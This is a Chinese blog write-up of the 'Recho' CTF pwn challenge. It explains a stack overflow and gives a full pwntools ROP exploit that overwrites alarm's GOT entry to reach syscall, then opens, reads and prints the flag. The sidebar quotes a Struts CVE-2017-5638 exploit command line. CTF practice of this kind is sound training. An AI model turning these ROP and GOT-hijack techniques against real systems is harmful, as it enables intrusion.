攻防世界(pwn)Recho(XCTF 3rd-RCTF-2017) writeup

最新推荐文章于 2022-03-11 20:27:57 发布
最新推荐文章于 2022-03-11 20:27:57 发布
阅读量1.2k 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xidoo1234/article/details/104532070
版权

checksec
64位程序,保护如上
main()
可以分析出程序大意,先读取字符串长度存入nptr与v7中,如果字符串长度小于15时将v7设为16,大于15则不变。然后读取v7个字符放入buf中,最后在末尾添上0并打印出来。
漏洞很显然,如果v7很大,则read会造成溢出并覆盖。但是分析发现要利用这个漏洞还是没有那么简单的。

Tips1.

主函数中有while循环判断是否读入结束,手动输入的时候可以ctrl+D表示输入结束,查阅资料以后发现pwntools竟然也有这个功能:

io.shutdown('send')

Tips2.

可以发现程序中给了flag字符串
shift+F12
Tips3.

找到了程序留的后门,我的第一反应是泄露地址,ret-to-libc。但突然发现,结束程序输入以跳出循环后无法再次输入payload,因为关闭了输入流就无法打开,除非重新运行程序…所以只能一次性搞定,遂放弃泄露地址,所以怎样ROP呢?

利用思路:

劫持GOT表执行syscall,系统调用open()打开flag文件,读出并打印

实现细节:

1. 修改alarm()为syscall

程序中没有给出open()函数,而open()属于系统调用,调用号为2。
故首先修改一个无用的系统调用函数(这里选alarm())的got表项为syscall,使调用alarm()函数时会执行系统调用,这里我们在alarm()设置断点gdb调试, 可以看到在0x5偏移处调用了syscall
alarm()
同时ROPgadget寻找代码碎片,记录
add_rdi_ret = 0x40070d
ROPgadget
pop_rax_ret = 0x4006fc
在这里插入图片描述
pop_rdi_ret = 0x4008a3
在这里插入图片描述
故如下构造

# alarm() ---> syscall
# alarm_got = alarm_got + 0x5

payload = 'a' * 0x38

# rdi = alarm_got
payload += p64(pop_rdi_ret) + p64(alarm_got)
# rax = 0x5
payload += p64(pop_rax_ret) + p64(0x5)
# [rdi] = [rdi] + 0x5 
payload += p64(add_rdi_ret)

2.fd = open(“flag”,READONLY)

提前将rax设为2后syscall即可调用open()
flag = 0x601058
pop_rsi_ret = 0x4008a1
ROPgadget
故如下构造

# fd = open("flag" , 0)

# rdi = &"flag"
payload += p64(pop_rdi_ret) + p64(flag)
# rsi = 0 (r15 = 0)
payload += p64(pop_rsi_ret) + p64(0) + p64(0)
# rax = 2
payload += p64(pop_rax_ret) + p64(2)
# open("flag" , 0)
payload += p64(alarm_plt)

3.read(fd,flag_buffer,50)

打开了flag文件后可以将内容用read读出,存放到一个可读写的位置,这里选bss+0x500
关于fd,一般open一个文件fd=3,打开第二个文件fd=4,以此类推
pop_rdx_ret = 0x4006fe
在这里插入图片描述
故构造如下:

# read(fd, bss+0x500, 50)

# rdi = 3
payload += p64(pop_rdi_ret) + p64(3)
# rsi = bss+0x500 (r15 = 0)
payload += p64(pop_rsi_ret) + p64(bss+0x500) + p64(0)
# rdx = 50
payload += p64(pop_rdx_ret) + p64(50)
# read(3, bss+0x500, 50)
payload += p64(read_plt)

4.printf(flag_buffer)

用printf()或write()输出flag内容

#print flag

# rdi = bss + 0x500
payload += p64(pop_rdi_ret) + p64(bss+0x500)
# printf(bss+0x500)
payload += p64(printf_plt)

总结:

exp如下

#! /usr/bin/env python
from pwn import *
context.log_level = 'debug'
elf=ELF('./773a2d87b17749b595ffb937b4d29936')
p=remote('111.198.29.45',*****)
prdi=0x4008a3
prsi=0x4008a1
prdx=0x4006fe
prax=0x4006fc
padd=0x40070d
alarm=elf.plt['alarm']
read=elf.plt['read']
write=elf.plt['write']
printf=elf.plt['printf']
alarm_got=elf.got['alarm']
flag=0x601058
bss=0x601090
payload='a'*0x38
payload+=p64(prax)+p64(0x5)
payload+=p64(prdi)+p64(alarm_got)
payload+=p64(padd)
payload+=p64(prax)+p64(0x2)
payload+=p64(prdi)+p64(flag)
payload+=p64(prdx)+p64(0)
payload+=p64(prsi)+p64(0)+p64(0)
payload+=p64(alarm)
payload+=p64(prdi)+p64(3)      
payload+=p64(prsi)+p64(bss+0x500)+p64(0)
payload+=p64(prdx)+p64(0x30)
payload+=p64(read)
payload+=p64(prdi)+p64(bss+0x500)
payload+=p64(printf)
p.recvuntil('Welcome to Recho server!\n')
p.sendline(str(0x200))
payload=payload.ljust(0x200,'\x00')
p.send(payload)
p.recv()
p.shutdown('send')
p.interactive()
p.close()
请务必让我来!
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
PWN系列】攻防世界 RECHO 题解
Vicl1fe的博客
11-03 449
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: https://www.freesion.com/article/5370510581/ 参考网址写的很详细。转载一下。
攻防世界--Recho
qq_73149934的博客
02-07 205
攻防世界--Recho
攻防世界Recho
weixin_43960998的博客
03-28 665
1.程序逆向 简单,略 2.漏洞利用 这道题想了半天,没想明白怎么退出循环,所以看了 ha1vk 师傅博客,学习了一波。 退出循环主要是利用 pwntools 提供的一个功能:shutdown。这个功能可以关闭流,这样就可以退出循环了。     因为对于有些系统,system 可以用系统调用,但是有些不行,所以这里采用 orw 的方式读取 flag。 shift + f12 可以看到 flag 字符串,所以也可能是提示我们。 题目中有了 read,write 可以使用
攻防世界 Pwn Recho
MrTreebook的博客
12-18 641
攻防世界 Pwn Recho1.题目下载地址2.checksec3.IDA分析4.exp 1.题目下载地址 点击下载 2.checksec 3.IDA分析 可以看到这个while是死循环 所以要学会使用pwntools的shutdown功能来退出循环 但是循环退出之后就不能再进入了 接下来要看一下漏洞在哪 这个题目有个明显后门,在data段发现有flag。可以将它read到bss段中,再通过write输出出来 在gdb动态调试时,分析alarm,发现有 有syscall系统调用 漏洞利用思路如下:
攻防世界进阶题Recho——知识点缝合怪
weixin_48066554的博客
09-20 827
攻防世界进阶题Recho——知识点缝合怪 文章目录攻防世界进阶题Recho——知识点缝合怪引入初分析1、checksec2、主函数结构3、栈结构4、特殊字符串解题过程1、gadget搜集2、GOT表详情3、函数参数说明exp(详细注释) 引入 好久没有做pwn题了,手生的厉害,做道简单题练练手好了 这道题其实难度不高,属于那种开门见山把漏洞点抛出任君采撷的题,但是由于涉及的知识点较多,在ROP链构造时需要有清晰的思路,对于我这样的小白来说自然是再好不过的练习题。 初分析 1、checksec 题目拿到手上,
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
Apache Struts CVE-2017-5638的漏洞利用 用法 测试单个URL。 python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id' 测试网址列表。 python struts-pwn.py --list 'urls.txt' ...
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc 知识点总结 本文总结了攻防世界pwn题:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn题:Recho.doc是一...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
pwn-x64-printf泄露题目
08-04
x64 printf回显漏洞
攻防世界高手进阶区——Recho
weixin_62675330的博客
03-11 414
攻防世界高手进阶区——Recho 题目什么也没给。(在这个题困了好久,一直在学基础,但是发现了一个更好用的学习网站,基本 ROP - CTF Wiki (ctf-wiki.org))希望对你们有用,估计以后就转战ctfwiki了。先做完这个题吧。 做题经历 int __cdecl main(int argc, const char **argv, const char **envp) { char nptr[16]; // [rsp+0h] [rbp-40h] BYREF char buf[40]
pwn-Recho
醉等佳人归
09-08 271
1.题目 1.保护机制 开启nx 2.关键代码 2.思路 重点1:看出来是个很简单的栈溢出,但是第一个问题是这个循环是个死循环,如果直接使用close()函数程序会直接退出,查询资料后发现pwn库中提供了shutdown()函数,他可以关闭IO流,即让循环正常退出 重点2:既然使用shutdown函数,我们必须一次性将payload发送过去,这就导致我们不能使用内存泄漏来泄漏system函数,查询了一下字符串发现有一个flag,所以我们考虑使用系统调用完成,alarm,open,read,write函数的
RNote XCTF 3rd-RCTF-2017 攻防世界
qq_41071646的博客
06-02 699
这个题 emmm 利用 off by one 然后就是double free 然后 写到 malloc_hook 就ok 不过这个题 我一开始出了一个问题 在 malloc_hook 里面我只是找到了 7f 然后我用了 0x30的堆块 然后不行 malloc的直接在堆块了 没有到我们想要的地方 只能又重新规划 然后 one_gadget 一把梭就好了 存...
攻防世界PWNRecho题解
seaaseesa的博客
11-09 2326
Recho 首先,还是查看一下程序的保护机制。看起来不错。 然后用IDA分析 看起来是一个很简单的溢出,然而,这题的难点在于这个循环如何结束。read一直都是真,如果是在linux终端上直接运行,我们可以用Ctrl+D,然而,pwn远程,就无法处理这种信号。幸运的是pwntools提供了一个shutdown功能,该功能可以关闭流,如果我们关闭输入流,这个循环就结束了。但是我们别想再次...
攻防世界)(pwn)(RCTF2017)Recho
PLpa的博客
09-07 1677
0x00.前言 又是一题栈溢出题,但是又有一点点不同。。。 0x01.程序逻辑 程序保护: 程序只开了NX保护,堆栈不可执行。 进入IDA 程序让你先输入你将要输入的字符串长度,然后继续让你输入字符串。 最后,程序会输出你输入的字符串。 看起来,这很像一般的栈溢出,甚至我们可以通过程序的输出把一些敏感的地址给输出出来。 更加让人欣喜的是,这个程序好像给了什么不得了的东西。 0x02.奇怪的东西...
攻防世界)(pwn)4-ReeHY-main
PLpa的博客
10-24 381
这题很早之前就做过了,之前做的时候没怎么注意,这次重新写又有很多感受。 0x00前言 这题有两种做法,一种是堆溢出,一种是栈溢出。第一次写的时候,由于刚刚入门,只会用栈溢出,这次重新看,用堆溢出试了一下,由于技术有限,还是出现了很多错误,找了很多资料,磕磕绊绊一下午才利用成功。 故写此博客记录一下。 0x01栈溢出利用方法 此题的栈溢出漏洞比较明显,因为他有一个很明显的整数溢出漏洞,可以导致栈漏洞...
xctf(misc)-部分wp
i_am_not_hacker的博客
08-13 439
ext3 ext3是第三代扩展文件系统,是一个日志文件系统,常用于Linux操作系统。它是很多Linux发行版的默认文件系统。 下载附件后,得到一个linux文件,拖进kali里面,使用mount命令挂载(Linux中mount命令用于挂载Linux系统外的文件) Linux下mount命令与mnt目录详解 挂载后我们使用命令 strings linux | grep flag 来查看字符串,...
ctf - pwn题之alarm函数
lifanxin的博客
12-15 2247
目录什么是alarm()为啥要使用alarm()关闭alarm()总结 什么是alarm()   如上图所示,在做一些pwn题的时候,我们有时会遇到alarm(0xAu)函数。alarm函数中的参数0xAu是十六进制无符号数,即十进制对应10,所以该函数的作用是在程序运行10秒后,给进程发送SIGALRM信号,如果不另编写程序接受处理此信号,则默认结束此程序。所以运行此样本10秒后的截图如下所示,程序结束时提示Alarm clock: 为啥要使用alarm()   知道什么是alarm(),那么为啥要设
XCTF 3rd-RCTF-2017 Recho
qq_41071646的博客
07-16 816
最近感觉事情比较忙 以前就是做了一些题 就总结一下 现在 是 如果题目一下就看出来了 就再也不会写博客了 估计以后博客会 越写越少 然后 这个题目 参考链接 https://www.xctf.org.cn/library/details/e0d90ad9d0609320fd6743706135a80913d27b8d/ 主程序 主要是有几点没有想到 第一点就是没有想到怎么退出循环...
攻防世界pwn-forgot
最新发布
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值